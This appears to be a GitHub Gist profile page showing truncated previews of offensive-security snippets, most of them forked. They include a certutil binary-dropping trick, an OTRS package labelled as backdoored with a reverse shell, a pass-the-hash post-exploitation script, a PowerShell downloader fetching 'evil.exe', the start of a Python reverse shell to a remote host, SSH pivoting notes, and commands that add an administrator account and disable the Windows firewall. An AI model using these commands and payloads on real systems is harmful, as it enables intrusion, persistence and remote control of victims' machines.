Robert Mckay buglessdr
buglessdr
/ drop_binary.bat
Created
September 1, 2017 06:28
— forked from mattifestation/drop_binary.bat
Drop binary data from the command line w/o needing PowerShell
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| echo -----BEGIN CERTIFICATE----- > encoded.txt | |
| echo Just Base64 encode your binary data | |
| echo TVoAAA== >> encoded.txt | |
| echo -----END CERTIFICATE----- >> encoded.txt | |
| certutil -decode encoded.txt decoded.bin |
buglessdr
/ MyPackage.opm
Created
September 1, 2017 06:14
— forked from mgeeky/MyPackage.opm
OTRS OPM backdoored Package with Reverse Shell
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <?xml version="1.0" encoding="utf-8" ?> | |
| <otrs_package version="1.1"> | |
| <Name>MyModule</Name> | |
| <Version>1.0.0</Version> | |
| <Vendor>My Module</Vendor> | |
| <URL>http://otrs.org/</URL> | |
| <License>GNU GENERAL PUBLIC LICENSE Version 2, June 1991</License> | |
| <ChangeLog Version="1.0.1" Date="2006-11-11 11:11:11">My Module.</ChangeLog> | |
| <Description Lang="en">MyModule</Description> | |
| <Framework>5.x.x</Framework> |
buglessdr
/ windows-post-exploitation.sh
Created
July 28, 2017 00:25
— forked from 1N3/windows-post-exploitation.sh
A Windows post exploitation shell script
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/bin/bash | |
| TARGET=$1 | |
| pth-winexe -U DOMAIN/USERNAME%PASSWORD --system //$TARGET "systeminfo" | |
| pth-winexe -U DOMAIN/USERNAME%PASSWORD --system //$TARGET "whoami /all" | |
| pth-winexe -U DOMAIN/USERNAME%PASSWORD --system //$TARGET "ipconfig /all" | |
| pth-winexe -U DOMAIN/USERNAME%PASSWORD --system //$TARGET "netstat -ano" | |
| pth-winexe -U DOMAIN/USERNAME%PASSWORD --system //$TARGET "net accounts" | |
| pth-winexe -U DOMAIN/USERNAME%PASSWORD --system //$TARGET "net localgroup USERNAMEs" | |
| pth-winexe -U DOMAIN/USERNAME%PASSWORD --system //$TARGET "net share" | |
| pth-winexe -U DOMAIN/USERNAME%PASSWORD --system //$TARGET "net view" |
buglessdr
/ simple_icacls_file_permission.bat
Created
July 19, 2017 21:24
Script that queries all services and searches for exeuctables that give the Everyone group RW access.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| @echo off | |
| REM Description: Script that queries all services and searches for exeuctables that give the Everyone group RW access. | |
| REM Type: Incorrect file permissions | |
| REM Note: The ^ characters escapes certain characters that break the FOR loop. | |
| REM Note: tokens=1* - The value at the first delimeter and everything after. | |
| for /f "tokens=1*" %%m in ('sc query state^= all ^| find "SERVICE_NAME"') do ( | |
| for /f "tokens=1* delims=: " %%r in ('sc qc "%%~n" ^| find "BINARY_PATH_NAME"') do ( | |
| for /f "delims=" %%x in ('echo(%%~s^| findstr /L /V /I /C:"%SystemRoot%\System32" /C:"%SystemRoot%\SysWOW64"') do ( | |
| icacls "%%~x" | |
| ) |
buglessdr
/ simple_py_line_splitter
Created
July 19, 2017 18:58
Python Line Splitter to limit lines to 80 chars
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/python | |
| import sys | |
| def split_by_length(s,block_size): | |
| w=[] | |
| n=len(s) | |
| for i in range(0,n,block_size): | |
| w.append(s[i:i+block_size]) | |
| if w[-1].isspace(): |
buglessdr
/ wget.ps1
Created
July 19, 2017 02:39
— forked from D-Virus/wget.ps1
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| echo $storageDir = $pwd > wget.ps1 | |
| echo $webclient = New‐Object System.Net.WebClient >>wget.ps1 | |
| echo $url = "http://192.168.10.52:8000/evil.exe" >>wget.ps1 | |
| echo $file = "new-exploit.exe" >>wget.ps1 | |
| echo $webclient.DownloadFile($url,$file) >>wget.ps1 |
buglessdr
/ simple_py_shell
Created
July 19, 2017 02:27
— forked from sckalath/simple_py_shell
Simple Python Shell
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/python | |
| # imports here | |
| # Copyright 2012 TrustedSec, LLC. All rights reserved. | |
| # | |
| # This piece of software code is licensed under the FreeBSD license.. | |
| # | |
| # Visit http://www.freebsd.org/copyright/freebsd-license.html for more information. | |
| import socket,subprocess | |
| HOST = '192.168.12.45' # The remote host | |
| PORT = 443 # The same port as used by the server |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| ##SOCKS Proxy## | |
| #Set up a SOCKS proxy on 127.0.0.1:1080 that lets you pivot through the remote host (10.0.0.1): | |
| #Command line: | |
| ssh -D 127.0.0.1:1080 10.0.0.1 | |
| #~/.ssh/config: | |
| Host 10.0.0.1 | |
| DynamicForward 127.0.0.1:1080 | |
| #You can then use tsocks or similar to use non-SOCKS-aware tools on hosts accessible from 10.0.0.1: |
buglessdr
/ windows_crap
Created
July 19, 2017 02:26
— forked from sckalath/windows_crap
windows crap
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #add a user | |
| net user ryan mwcb /add | |
| #add user to local administrators | |
| net localgroup administrators /add ryan | |
| #remove firewall | |
| netsh firewall set opmode disable | |
| #enabled remote desktop |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #get a pty through python | |
| python -c 'import pty; pty.spawn("/bin/bash");' | |
| #grab the user agent from the http header on port 10443 | |
| tcpdump -A -l -vvvs 1024 -npi eth0 port 10443 | |
| #base64 decode a string | |
| echo STRINGTODECODE | base64 --decode | |
| #escape jail shell |